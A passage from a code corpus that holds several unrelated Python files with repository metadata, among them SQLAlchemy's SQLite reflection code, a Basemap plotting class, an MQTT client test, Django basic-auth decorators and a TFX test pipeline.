sqltext = ""
if tablesql:
pattern = r"[^,]*\s+AS\s+\(([^,]*)\)\s*(?:virtual|stored)?"
match = re.search(
re.escape(name) + pattern, tablesql, re.IGNORECASE
)
if match:
sqltext = match.group(1)
colspec["computed"] = {"sqltext": sqltext, "persisted": persisted}
return colspec
def _resolve_type_affinity(self, type_):
"""Return a data type from a reflected column, using affinity rules.
SQLite's goal for universal compatibility introduces some complexity
during reflection, as a column's defined type might not actually be a
type that SQLite understands - or indeed, my not be defined *at all*.
Internally, SQLite handles this with a 'data type affinity' for each
column definition, mapping to one of 'TEXT', 'NUMERIC', 'INTEGER',
'REAL', or 'NONE' (raw bits). The algorithm that determines this is
listed in https://www.sqlite.org/datatype3.html section 2.1.
This method allows SQLAlchemy to support that algorithm, while still
providing access to smarter reflection utilities by recognizing
column definitions that SQLite only supports through affinity (like
DATE and DOUBLE).
"""
match = re.match(r"([\w ]+)(\(.*?\))?", type_)
if match:
coltype = match.group(1)
args = match.group(2)
else:
coltype = ""
args = ""
if coltype in self.ischema_names:
coltype = self.ischema_names[coltype]
elif "INT" in coltype:
coltype = sqltypes.INTEGER
elif "CHAR" in coltype or "CLOB" in coltype or "TEXT" in coltype:
coltype = sqltypes.TEXT
elif "BLOB" in coltype or not coltype:
coltype = sqltypes.NullType
elif "REAL" in coltype or "FLOA" in coltype or "DOUB" in coltype:
coltype = sqltypes.REAL
else:
coltype = sqltypes.NUMERIC
if args is not None:
args = re.findall(r"(\d+)", args)
try:
coltype = coltype(*[int(a) for a in args])
except TypeError:
util.warn(
"Could not instantiate type %s with "
"reflected arguments %s; using no arguments."
% (coltype, args)
)
coltype = coltype()
else:
coltype = coltype()
return coltype
@reflection.cache
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
constraint_name = None
table_data = self._get_table_sql(connection, table_name, schema=schema)
if table_data:
PK_PATTERN = r"CONSTRAINT (\w+) PRIMARY KEY"
result = re.search(PK_PATTERN, table_data, re.I)
constraint_name = result.group(1) if result else None
cols = self.get_columns(connection, table_name, schema, **kw)
cols.sort(key=lambda col: col.get("primary_key"))
pkeys = []
for col in cols:
if col["primary_key"]:
pkeys.append(col["name"])
return {"constrained_columns": pkeys, "name": constraint_name}
@reflection.cache
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
# sqlite makes this *extremely difficult*.
# First, use the pragma to get the actual FKs.
pragma_fks = self._get_table_pragma(
connection, "foreign_key_list", table_name, schema=schema
)
fks = {}
for row in pragma_fks:
(numerical_id, rtbl, lcol, rcol) = (row[0], row[2], row[3], row[4])
if not rcol:
# no referred column, which means it was not named in the
# original DDL. The referred columns of the foreign key
# constraint are therefore the primary key of the referred
# table.
referred_pk = self.get_pk_constraint(
connection, rtbl, schema=schema, **kw
)
# note that if table doesn't exist, we still get back a record,
# just it has no columns in it
referred_columns = referred_pk["constrained_columns"]
else:
# note we use this list only if this is the first column
# in the constraint. for subsequent columns we ignore the
# list and append "rcol" if present.
referred_columns = []
if self._broken_fk_pragma_quotes:
rtbl = re.sub(r"^[\"\[`\']|[\"\]`\']$", "", rtbl)
if numerical_id in fks:
fk = fks[numerical_id]
else:
fk = fks[numerical_id] = {
"name": None,
"constrained_columns": [],
"referred_schema": schema,
"referred_table": rtbl,
"referred_columns": referred_columns,
"options": {},
}
fks[numerical_id] = fk
fk["constrained_columns"].append(lcol)
if rcol:
fk["referred_columns"].append(rcol)
def fk_sig(constrained_columns, referred_table, referred_columns):
return (
tuple(constrained_columns)
+ (referred_table,)
+ tuple(referred_columns)
)
# then, parse the actual SQL and attempt to find DDL that matches
# the names as well. SQLite saves the DDL in whatever format
# it was typed in as, so need to be liberal here.
keys_by_signature = dict(
(
fk_sig(
fk["constrained_columns"],
fk["referred_table"],
fk["referred_columns"],
),
fk,
)
for fk in fks.values()
)
table_data = self._get_table_sql(connection, table_name, schema=schema)
if table_data is None:
# system tables, etc.
return []
def parse_fks():
FK_PATTERN = (
r"(?:CONSTRAINT (\w+) +)?"
r"FOREIGN KEY *\( *(.+?) *\) +"
r'REFERENCES +(?:(?:"(.+?)")|([a-z0-9_]+)) *\((.+?)\) *'
r"((?:ON (?:DELETE|UPDATE) "
r"(?:SET NULL|SET DEFAULT|CASCADE|RESTRICT|NO ACTION) *)*)"
)
for match in re.finditer(FK_PATTERN, table_data, re.I):
(
constraint_name,
constrained_columns,
referred_quoted_name,
referred_name,
referred_columns,
onupdatedelete,
) = match.group(1, 2, 3, 4, 5, 6)
constrained_columns = list(
self._find_cols_in_sig(constrained_columns)
)
if not referred_columns:
referred_columns = constrained_columns
else:
referred_columns = list(
self._find_cols_in_sig(referred_columns)
)
referred_name = referred_quoted_name or referred_name
options = {}
for token in re.split(r" *\bON\b *", onupdatedelete.upper()):
if token.startswith("DELETE"):
ondelete = token[6:].strip()
if ondelete and ondelete != "NO ACTION":
options["ondelete"] = ondelete
elif token.startswith("UPDATE"):
onupdate = token[6:].strip()
if onupdate and onupdate != "NO ACTION":
options["onupdate"] = onupdate
yield (
constraint_name,
constrained_columns,
referred_name,
referred_columns,
options,
)
fkeys = []
for (
constraint_name,
constrained_columns,
referred_name,
referred_columns,
options,
) in parse_fks():
sig = fk_sig(constrained_columns, referred_name, referred_columns)
if sig not in keys_by_signature:
util.warn(
"WARNING: SQL-parsed foreign key constraint "
"'%s' could not be located in PRAGMA "
"foreign_keys for table %s" % (sig, table_name)
)
continue
key = keys_by_signature.pop(sig)
key["name"] = constraint_name
key["options"] = options
fkeys.append(key)
# assume the remainders are the unnamed, inline constraints, just
# use them as is as it's extremely difficult to parse inline
# constraints
fkeys.extend(keys_by_signature.values())
return fkeys
def _find_cols_in_sig(self, sig):
for match in re.finditer(r'(?:"(.+?)")|([a-z0-9_]+)', sig, re.I):
yield match.group(1) or match.group(2)
@reflection.cache
def get_unique_constraints(
self, connection, table_name, schema=None, **kw
):
auto_index_by_sig = {}
for idx in self.get_indexes(
connection,
table_name,
schema=schema,
include_auto_indexes=True,
**kw,
):
if not idx["name"].startswith("sqlite_autoindex"):
continue
sig = tuple(idx["column_names"])
auto_index_by_sig[sig] = idx
table_data = self._get_table_sql(
connection, table_name, schema=schema, **kw
)
if not table_data:
return []
unique_constraints = []
def parse_uqs():
UNIQUE_PATTERN = r'(?:CONSTRAINT "?(.+?)"? +)?UNIQUE *\((.+?)\)'
INLINE_UNIQUE_PATTERN = (
r'(?:(".+?")|(?:[\[`])?([a-z0-9_]+)(?:[\]`])?) '
r"+[a-z0-9_ ]+? +UNIQUE"
)
for match in re.finditer(UNIQUE_PATTERN, table_data, re.I):
name, cols = match.group(1, 2)
yield name, list(self._find_cols_in_sig(cols))
# we need to match inlines as well, as we seek to differentiate
# a UNIQUE constraint from a UNIQUE INDEX, even though these
# are kind of the same thing :)
for match in re.finditer(INLINE_UNIQUE_PATTERN, table_data, re.I):
cols = list(
self._find_cols_in_sig(match.group(1) or match.group(2))
)
yield None, cols
for name, cols in parse_uqs():
sig = tuple(cols)
if sig in auto_index_by_sig:
auto_index_by_sig.pop(sig)
parsed_constraint = {"name": name, "column_names": cols}
unique_constraints.append(parsed_constraint)
# NOTE: auto_index_by_sig might not be empty here,
# the PRIMARY KEY may have an entry.
return unique_constraints
@reflection.cache
def get_check_constraints(self, connection, table_name, schema=None, **kw):
table_data = self._get_table_sql(
connection, table_name, schema=schema, **kw
)
if not table_data:
return []
CHECK_PATTERN = r"(?:CONSTRAINT (\w+) +)?" r"CHECK *\( *(.+) *\),? *"
check_constraints = []
# NOTE: we aren't using re.S here because we actually are
# taking advantage of each CHECK constraint being all on one
# line in the table definition in order to delineate. This
# necessarily makes assumptions as to how the CREATE TABLE
# was emitted.
for match in re.finditer(CHECK_PATTERN, table_data, re.I):
check_constraints.append(
{"sqltext": match.group(2), "name": match.group(1)}
)
return check_constraints
@reflection.cache
def get_indexes(self, connection, table_name, schema=None, **kw):
pragma_indexes = self._get_table_pragma(
connection, "index_list", table_name, schema=schema
)
indexes = []
include_auto_indexes = kw.pop("include_auto_indexes", False)
for row in pragma_indexes:
# ignore implicit primary key index.
# https://www.mail-archive.com/[email protected]/msg30517.html
if not include_auto_indexes and row[1].startswith(
"sqlite_autoindex"
):
continue
indexes.append(dict(name=row[1], column_names=[], unique=row[2]))
# loop thru unique indexes to get the column names.
for idx in list(indexes):
pragma_index = self._get_table_pragma(
connection, "index_info", idx["name"]
)
for row in pragma_index:
if row[2] is None:
util.warn(
"Skipped unsupported reflection of "
"expression-based index %s" % idx["name"]
)
indexes.remove(idx)
break
else:
idx["column_names"].append(row[2])
return indexes
@reflection.cache
def _get_table_sql(self, connection, table_name, schema=None, **kw):
if schema:
schema_expr = "%s." % (
self.identifier_preparer.quote_identifier(schema)
)
else:
schema_expr = ""
try:
s = (
"SELECT sql FROM "
" (SELECT * FROM %(schema)ssqlite_master UNION ALL "
" SELECT * FROM %(schema)ssqlite_temp_master) "
"WHERE name = ? "
"AND type = 'table'" % {"schema": schema_expr}
)
rs = connection.exec_driver_sql(s, (table_name,))
except exc.DBAPIError:
s = (
"SELECT sql FROM %(schema)ssqlite_master "
"WHERE name = ? "
"AND type = 'table'" % {"schema": schema_expr}
)
rs = connection.exec_driver_sql(s, (table_name,))
return rs.scalar()
def _get_table_pragma(self, connection, pragma, table_name, schema=None):
quote = self.identifier_preparer.quote_identifier
if schema is not None:
statements = ["PRAGMA %s." % quote(schema)]
else:
# because PRAGMA looks in all attached databases if no schema
# given, need to specify "main" schema, however since we want
# 'temp' tables in the same namespace as 'main', need to run
# the PRAGMA twice
statements = ["PRAGMA main.", "PRAGMA temp."]
qtable = quote(table_name)
for statement in statements:
statement = "%s%s(%s)" % (statement, pragma, qtable)
cursor = connection.exec_driver_sql(statement)
if not cursor._soft_closed:
# work around SQLite issue whereby cursor.description
# is blank when PRAGMA returns no rows:
# https://www.sqlite.org/cvstrac/tktview?tn=1884
result = cursor.fetchall()
else:
result = []
if result:
return result
else:
return []
| 34.656669 | 110 | 0.599601 | [
"MIT"
] | aalvrz/sqlalchemy | lib/sqlalchemy/dialects/sqlite/base.py | 87,820 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
#-----------------------------------------------------------------------------------------
class GeoMap:
'''
INFO:
Map boundary edges order:
[LeftLowerLon,LeftLowerLat,UpperRightLon,UpperRightLat]
Background type:
'none'
'etopo'
'esri' --> background source
Background sources available for 'esri':
ESRI_Imagery_World_2D (MapServer)
ESRI_StreetMap_World_2D (MapServer)
I3_Imagery_Prime_World (GlobeServer)
NASA_CloudCover_World (GlobeServer)
NatGeo_World_Map (MapServer)
NGS_Topo_US_2D (MapServer)
Ocean_Basemap (MapServer)
USA_Topo_Maps (MapServer)
World_Imagery (MapServer)
World_Physical_Map (MapServer)
World_Shaded_Relief (MapServer)
World_Street_Map (MapServer)
World_Terrain_Base (MapServer)
World_Topo_Map (MapServer)
'''
#---------------------------------------------------------------------------------------
def __init__(self, Cfg=[]):
# Defaults (example setting)
if not Cfg:
self._cfg = {'Bounds': [7., 36., 19., 48.],
'FigSize': [6., 6.],
'Background': ['esri','World_Terrain_Base',1500],
'Grid': [5., 5.]}
else:
self._cfg = Cfg
self._zo = 1
#---------------------------------------------------------------------------------------
def BasePlot(self):
plt.figure(figsize = (self._cfg['FigSize'][0],
self._cfg['FigSize'][1]))
# Basemap
self._map = Basemap(self._cfg['Bounds'][0],
self._cfg['Bounds'][1],
self._cfg['Bounds'][2],
self._cfg['Bounds'][3],
resolution = 'l',
projection = 'tmerc',
epsg = 3857)
# Background land
if self._cfg['Background'][0] == 'color':
self._map.drawlsmask(land_color = self._cfg['Background'][1],
ocean_color = self._cfg['Background'][2],
grid = 1.25,
lakes = True)
if self._cfg['Background'][0] == 'etopo':
self._map.etopo(zorder = self._zo)
if self._cfg['Background'][0] == 'esri':
self._map.arcgisimage(service = self._cfg['Background'][1],
xpixels = self._cfg['Background'][2],
dpi = 300,
zorder = self._zo)
if self._cfg['Background'][0] == 'relief':
self._map.shadedrelief()
#---------------------------------------------------------------------------------------
def DrawGrid(self):
# Parallels and meridians
parallels = np.arange(-90, 90, self._cfg['Grid'][1])
meridians = np.arange(0, 360., self._cfg['Grid'][0])
self._zo += 1
self._map.drawparallels(parallels, labels = [1,0,0,0],
fontsize = 14, weight = 'normal',
linewidth = 0.5,
zorder = self._zo)
self._zo += 1
self._map.drawmeridians(meridians, labels = [0,0,0,1],
fontsize = 14, weight = 'normal',
linewidth = 0.5,
zorder = self._zo)
#---------------------------------------------------------------------------------------
def DrawBounds(self):
# Boundaries and lines
self._zo += 1
self._map.drawcoastlines(linewidth = 0.8,
zorder = self._zo)
self._zo += 1
self._map.drawstates(linewidth = 0.8,
zorder = self._zo)
self._zo += 1
self._map.drawcountries(linewidth = 0.8,
zorder = self._zo)
self._zo += 1
self._map.drawrivers(linewidth = 0.1,
color = 'b',
zorder = self._zo)
"""
self._zo += 1
self._map.drawmapboundary(linewidth = 2,
color = 'k',
zorder = self._zo)
"""
#---------------------------------------------------------------------------------------
def Title(self, string, Set=['bold','k',18]):
plt.title(string, weight = Set[0],
color = Set[1],
fontsize = Set[2])
#---------------------------------------------------------------------------------------
def PointPlot(self, Lon, Lat, Label=[], Set=['o','y',5,1]):
x, y = self._map(Lon, Lat)
self._zo += 1
self._map.plot(x, y, Set[0],
color = Set[1],
markersize = Set[2],
markeredgewidth = Set[3],
label = Label,
zorder = self._zo)
#---------------------------------------------------------------------------------------
def LabelPlot(self, Lon, Lat, Label, Set=['normal','k',14]):
x, y = self._map(Lon, Lat)
# If only one label provided, convert to list
if isinstance(Label, str):
x = [x]
y = [y]
Label = [Label]
self._zo += 1
for i, string in enumerate(Label):
plt.text(x[i], y[i], string, weight = Set[0],
color = Set[1],
fontsize = Set[2],
zorder = self._zo)
#---------------------------------------------------------------------------------------
def AreaPlot(self, Lon, Lat, Set=['y',1,'k',1]):
x, y = self._map(Lon, Lat)
if Set[0]:
self._zo += 1
plt.fill(x, y, color = Set[0],
alpha = Set[1],
zorder = self._zo)
if Set[2]:
self._zo += 1
plt.plot(x, y, Set[2],
linewidth = Set[3],
zorder = self._zo)
#---------------------------------------------------------------------------------------
def MeshPlot(self, Lon, Lat, Elev, Cmap=[], Clim=[], Mesh=True):
from matplotlib.colors import BoundaryNorm
from matplotlib.ticker import MaxNLocator
x, y = self._map(Lon, Lat)
z = Elev
if not Cmap:
Cmap = cm.jet
# cmap.set_under('w', alpha=0.)
if not Clim:
Clim = [z.min(), z.max()]
levels = MaxNLocator(nbins=16).tick_values(Clim[0], Clim[1])
norm = BoundaryNorm(levels, ncolors = Cmap.N, clip=True)
if not Mesh:
self._zo += 1
h = plt.scatter(x, y, c = z,
s = 20,
marker = 's',
cmap = Cmap,
vmin = Clim[0],
vmax = Clim[1],
lw = 0,
alpha = 1.,
zorder = self._zo)
else:
self._zo += 1
z = z[:-1, :-1]
h = plt.pcolormesh(x, y, z, cmap = Cmap,
norm = norm,
vmin = Clim[0],
vmax = Clim[1],
lw = 0,
alpha = 1.,
zorder = self._zo)
clb = plt.gcf().colorbar(h, orientation = 'vertical')
clb.outline.set_linewidth(1)
clb.ax.tick_params(labelsize=14)
clb.set_label('Spectral Acceleration ($g$)', size=12)
#---------------------------------------------------------------------------------------
def ShapeFile(self, ShpFile, Name, Color='k'):
# NOTE: this doesn't always work with polygons,
# better to use the function in crd_tool
self._zo += 1
self._map.readshapefile(ShpFile,
Name,
linewidth = 1.5,
drawbounds = True,
color = Color,
zorder = self._zo)
#---------------------------------------------------------------------------------------
def Legend(self, Location=[]):
self._zo += 1
if Location:
l = plt.legend(loc = Location, numpoints = 1)
else:
# Default outside
l = plt.legend(bbox_to_anchor = (1.05, 1),
loc = 2, borderaxespad = 0.,
numpoints = 1)
l.set_zorder(self._zo)
#---------------------------------------------------------------------------------------
def Show(self):
plt.show(block = False)
#---------------------------------------------------------------------------------------
def Close(self):
plt.close('all')
#---------------------------------------------------------------------------------------
def SaveFig(self, OutFile, Dpi=150):
plt.savefig(OutFile, bbox_inches = 'tight', dpi = Dpi)
| 30.937282 | 90 | 0.401847 | [
"MIT"
] | wqqpp007/geoist | geoist/cattools/MapTools.py | 8,879 | Python |
#!/usr/bin/env python
# Test whether a client sends a correct PUBLISH to a topic with QoS 2 and responds to a disconnect.
import context
import paho_test
rc = 1
keepalive = 60
connect_packet = paho_test.gen_connect(
"publish-qos2-test", keepalive=keepalive, clean_session=False,
)
connack_packet = paho_test.gen_connack(rc=0)
disconnect_packet = paho_test.gen_disconnect()
mid = 1
publish_packet = paho_test.gen_publish(
u"pub/qos2/test", qos=2, mid=mid, payload="message".encode('utf-8'))
publish_dup_packet = paho_test.gen_publish(
u"pub/qos2/test", qos=2, mid=mid, payload="message".encode('utf-8'), dup=True)
pubrec_packet = paho_test.gen_pubrec(mid)
pubrel_packet = paho_test.gen_pubrel(mid)
pubcomp_packet = paho_test.gen_pubcomp(mid)
sock = paho_test.create_server_socket()
client = context.start_client()
try:
(conn, address) = sock.accept()
conn.settimeout(5)
if paho_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if paho_test.expect_packet(conn, "publish", publish_packet):
# Disconnect client. It should reconnect.
conn.close()
(conn, address) = sock.accept()
conn.settimeout(15)
if paho_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if paho_test.expect_packet(conn, "retried publish", publish_dup_packet):
conn.send(pubrec_packet)
if paho_test.expect_packet(conn, "pubrel", pubrel_packet):
# Disconnect client. It should reconnect.
conn.close()
(conn, address) = sock.accept()
conn.settimeout(15)
# Complete connection and message flow.
if paho_test.expect_packet(conn, "connect", connect_packet):
conn.send(connack_packet)
if paho_test.expect_packet(conn, "retried pubrel", pubrel_packet):
conn.send(pubcomp_packet)
if paho_test.expect_packet(conn, "disconnect", disconnect_packet):
rc = 0
conn.close()
finally:
client.terminate()
client.wait()
sock.close()
exit(rc)
| 31.810811 | 99 | 0.614274 | [
"Unlicense"
] | Jegeva/BruCON_2021 | backend/mqtt_react/python_bugg/paho.mqtt.python/test/lib/03-publish-c2b-qos2-disconnect.py | 2,354 | Python |
import base64
from django.http import HttpResponse
from django.contrib.auth import authenticate, login
# Reference: https://www.djangosnippets.org/snippets/243/
def view_or_basicauth(view, request, test_func, realm="", *args, **kwargs):
"""
This is a helper function used by both 'logged_in_or_basicauth' and
'has_perm_or_basicauth' that does the nitty of determining if they
are already logged in or if they have provided proper http-authorization
and returning the view if all goes well, otherwise responding with a 401.
"""
if test_func(request.user):
# Already logged in, just return the view.
return view(request, *args, **kwargs)
# They are not logged in. See if they provided login credentials
if 'HTTP_AUTHORIZATION' in request.META:
auth = request.META['HTTP_AUTHORIZATION'].split()
if len(auth) == 2:
# NOTE: We only support basic authentication for now.
if auth[0].lower() == "basic":
uname, passwd = base64.b64decode(auth[1]).split(':')
user = authenticate(username=uname, password=passwd)
if user is not None:
if user.is_active:
login(request, user)
request.user = user
return view(request, *args, **kwargs)
# Either they did not provide an authorization header or
# something in the authorization attempt failed. Send a 401
# back to them to ask them to authenticate.
response = HttpResponse()
response.status_code = 401
response['WWW-Authenticate'] = 'Basic realm="%s"' % realm
return response
def logged_in_or_basicauth(realm=""):
"""
A simple decorator that requires a user to be logged in. If they are not
logged in the request is examined for a 'authorization' header.
If the header is present it is tested for basic authentication and
the user is logged in with the provided credentials.
If the header is not present a http 401 is sent back to the
requestor to provide credentials.
The purpose of this is that in several django projects I have needed
several specific views that need to support basic authentication, yet the
web site as a whole used django's provided authentication.
The uses for this are for urls that are access programmatically such as
by rss feed readers, yet the view requires a user to be logged in. Many rss
readers support supplying the authentication credentials via http basic
auth (and they do NOT support a redirect to a form where they post a
username/password.)
Usage is simple:
@logged_in_or_basicauth()
def your_view:
...
You can provide the name of the realm to ask for authentication within.
"""
def view_decorator(func):
def wrapper(request, *args, **kwargs):
return view_or_basicauth(func, request,
lambda u: u.is_authenticated(),
realm, *args, **kwargs)
return wrapper
return view_decorator
def has_perm_or_basicauth(perm, realm=""):
"""
This is similar to the above decorator 'logged_in_or_basicauth'
except that it requires the logged in user to have a specific
permission.
Use:
@logged_in_or_basicauth('asforums.view_forumcollection')
def your_view:
...
"""
def view_decorator(func):
def wrapper(request, *args, **kwargs):
return view_or_basicauth(func, request,
lambda u: u.has_perm(perm),
realm, *args, **kwargs)
return wrapper
return view_decorator
| 37.4 | 79 | 0.649198 | [
"MIT"
] | tullyrankin/python-frameworks | django/basic_auth/example1/decorators.py | 3,740 | Python |
# Configuration file with default options,
# There are four main sections: General, Features, LQP and Learning corresponding to different
# functionalities. You can disable any of the Features or Learning section (by commenting it out) according to your requirement.
[General]
# general options
idir=/home/hussain/datasets/LFW/lfwa # images directory path
odir=/scratch/testing/new-experiments/ # path where cropped_images, learned model and computed features will be stored
dataset=LFW # name of dataset to use; it can be either LFW or FERET [currently not supported]
width=80 # width of cropped images
height=150 # height of cropped images
padding=10 # (same as cellsize) use a padding of one cell on each side. This value must be same as the option cell-size has in the features section
xoffset=1 # offsets to be added (from the center position) to the crop window placed over the original aligned images
yoffset=-4
cbdataset=train-val # complete # This option is used only with LQP Features. It is used to choose subset of dataset for codebook learning e.g. in case of LFW it can be either view1 training validation ('train-val') subset or complete view1 set('complete')
ftype=LQP # Feature types. Choice can be LBP, LTP, LBP+LTP or LQP
usergb=False # if color images, use color information during feature computations.
[Features]
# options for feature computation
listfile="" # a list file containing list of cropped images to compute features
cellsize=10 # cellsize for the histogram grid
tol=5 # [5,7] # tolerance values used for LTP or LQP features (can pass a list, i.e. tol=[5, 7])
[LQP] #LQP Options
lqptype=2 # LQP type represent LQP geometric structure.
# Choices can be either Disk (2) or Hor+Ver+Diag+ADiag (9) strip.
lqpsize=7 # LQP size represent radius (length of strip)
# of LQP disk (HVDA strip) (can pass a list i.e. lqpsize=[5,7])
coding=4 # LQP encoding type can be: Binary (0), Ternary (1) or Split-Ternary (4)
cbsize=150 # Codebook size (number of visual words) used for
# LQP computation (can pass a list, i.e. cbsize=[100, 150]
cbfile="" # [Optional] A list file containing list of images for learning the codebook
[Learning]
# options for model learning
view=complete # view2 # complete # Choice of the dataset, options cans be view1: used for
# parameter tuning purposes; view2: used only for model
# evaluation; complete: a model parameters will be first
# tuned on view1 and results will be reported on view2
ttype=with-pca # Choice of Training with or without PCA (for feature
# evaluation) Available options are with-pca or without-
# (a pca model is learned and features are compared in the pca space)
# or without-pca (features are compared in there original space)
featdir="" # Directory path where computed features have been stored, used if
# learning is being done without feature computation cycle.
dist=cosine # Distance metric for comparing features. Choices are cosine, chi-square and L2.
# For optimal results use cosine metric for comparing PCA reduced features and
# chi-squared for comparing non-reduced ones.
pcadim=[100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2000] # Number of PCA components. You can pass a scalar or list, i.e.
# pcadim= 500. In case of a list, all the dimensions will be used
# for model learning (on view1) and finally only the best performing one will be
# kept. Note that a single model with max(pcadim) is learned in this case
# but evaluation is done using all the dimensions.
# Caution: providing a much higher dimension makes the learning slow and memory
# intensive
| 68.241379 | 256 | 0.698585 | [
"BSD-3-Clause"
] | csgcmai/lqp_face | face-rec/config.py | 3,958 | Python |
from __future__ import print_function
import os
import xml.etree.ElementTree as ET
def load_xml_for_module(xml_dir_path, module_name, or_dummy=True):
xml_tree = ET.Element("dummy") if or_dummy else None
for sfx in ["_8hpp", "_8h"]:
xml_path = os.path.join(xml_dir_path, "%s%s.xml" % (module_name, sfx))
if os.path.isfile(xml_path):
with open(xml_path, "rb") as fin:
xml_tree = ET.fromstring(fin.read())
return xml_tree
def get_toplevel_functions(xml_tree, name=None):
path = "./compounddef/sectiondef[@kind='%s']/memberdef[@kind='function']"
if name:
path = "%s/[name='%s']" % (path, name)
all_nodes = []
for section_kind in ["func", "user-defined"]:
nodes = xml_tree.findall(path % section_kind)
all_nodes.extend(map(lambda n: n, nodes))
return all_nodes
def get_single_child_element_text_contents(el, child_element_tag):
nodes = el.findall("./%s" % child_element_tag)
nnodes = len(nodes)
if nnodes == 0:
return None
text = nodes[0].text
if nnodes > 1:
print("Warning: more than 1 child element with tag '%s' found; picking first" % (child_element_tag,))
return text
def for_each_param(node, callback):
assert(node.tag == "memberdef" and node.attrib.get("kind") == "function")
plist = node.find("./detaileddescription/para/parameterlist[@kind='param']")
def get_direct_text(n, tag):
c = n.find("./%s" % tag)
if c is not None:
return " ".join(c.itertext()).strip()
for param in node.findall("./param"):
name, ptyp, desc = None, None, None
name = get_direct_text(param, "declname")
ptyp = get_direct_text(param, "type")
if name and plist is not None:
for plist_item in plist.findall("parameteritem"):
if plist_item.find("./parameternamelist/[parametername='%s']" % name) is not None:
pdesc_node = plist_item.find("./parameterdescription")
if pdesc_node is not None:
desc = " ".join(pdesc_node.itertext()).strip()
callback(name, ptyp, desc)
| 40.754717 | 109 | 0.622685 | [
"BSD-3-Clause"
] | 745198699/src | tools/doxygen_utils.py | 2,160 | Python |
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test pipeline for tfx.dsl.compiler.compiler."""
import os
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import ImporterNode
from tfx.components import Pusher
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components.trainer.executor import GenericExecutor
from tfx.dsl.components.base import executor_spec
from tfx.dsl.components.common import resolver
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.orchestration import data_types
from tfx.orchestration import pipeline
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types import standard_artifacts
def create_test_pipeline():
"""Builds an Iris example pipeline with slight changes."""
pipeline_name = "iris"
iris_root = "iris_root"
serving_model_dir = os.path.join(iris_root, "serving_model", pipeline_name)
tfx_root = "tfx_root"
data_path = os.path.join(tfx_root, "data_path")
pipeline_root = os.path.join(tfx_root, "pipelines", pipeline_name)
example_gen = CsvExampleGen(input_base=data_path)
statistics_gen = StatisticsGen(examples=example_gen.outputs["examples"])
importer = ImporterNode(
source_uri="m/y/u/r/i",
properties={
"split_names": "['train', 'eval']",
},
custom_properties={
"int_custom_property": 42,
"str_custom_property": "42",
},
artifact_type=standard_artifacts.Examples).with_id("my_importer")
another_statistics_gen = StatisticsGen(
examples=importer.outputs["result"]).with_id("another_statistics_gen")
schema_gen = SchemaGen(statistics=statistics_gen.outputs["statistics"])
example_validator = ExampleValidator(
statistics=statistics_gen.outputs["statistics"],
schema=schema_gen.outputs["schema"])
trainer = Trainer(
# Use RuntimeParameter as module_file to test out RuntimeParameter in
# compiler.
module_file=data_types.RuntimeParameter(
name="module_file",
default=os.path.join(iris_root, "iris_utils.py"),
ptype=str),
custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
examples=example_gen.outputs["examples"],
schema=schema_gen.outputs["schema"],
train_args=trainer_pb2.TrainArgs(num_steps=2000),
# Attaching `TrainerArgs` as platform config is not sensible practice,
# but is only for testing purpose.
eval_args=trainer_pb2.EvalArgs(num_steps=5)).with_platform_config(
config=trainer_pb2.TrainArgs(num_steps=2000))
model_resolver = resolver.Resolver(
strategy_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(
type=standard_artifacts.Model, producer_component_id=trainer.id),
model_blessing=Channel(type=standard_artifacts.ModelBlessing)).with_id(
"latest_blessed_model_resolver")
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(signature_name="eval")],
slicing_specs=[tfma.SlicingSpec()],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
"sparse_categorical_accuracy":
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={"value": 0.6}),
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={"value": -1e-10}))
})
])
evaluator = Evaluator(
examples=example_gen.outputs["examples"],
model=trainer.outputs["model"],
baseline_model=model_resolver.outputs["model"],
eval_config=eval_config)
pusher = Pusher(
model=trainer.outputs["model"],
model_blessing=evaluator.outputs["blessing"],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=serving_model_dir)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen,
statistics_gen,
another_statistics_gen,
importer,
schema_gen,
example_validator,
trainer,
model_resolver,
evaluator,
pusher,
],
enable_cache=True,
beam_pipeline_args=["--my_testing_beam_pipeline_args=foo"],
# Attaching `TrainerArgs` as platform config is not sensible practice,
# but is only for testing purpose.
platform_config=trainer_pb2.TrainArgs(num_steps=2000),
execution_mode=pipeline.ExecutionMode.SYNC)
| 38.711268 | 78 | 0.709478 | [
"Apache-2.0"
] | Saiprasad16/tfx | tfx/dsl/compiler/testdata/iris_pipeline_sync.py | 5,497 | Python |
"""Similar to DDPG except we only need obs and act, not the reward, etc.
"""
import numpy as np
class RingBuffer(object):
def __init__(self, maxlen, shape, dtype='float32'):
self.maxlen = maxlen
self.start = 0
self.length = 0
if dtype == 'uint8':
# Daniel: special case with our XP replay. Force memory allocation
# right away by the += 0 op, to check that system has enough RAM.
# Might not be good for speed so we'll have to time it.
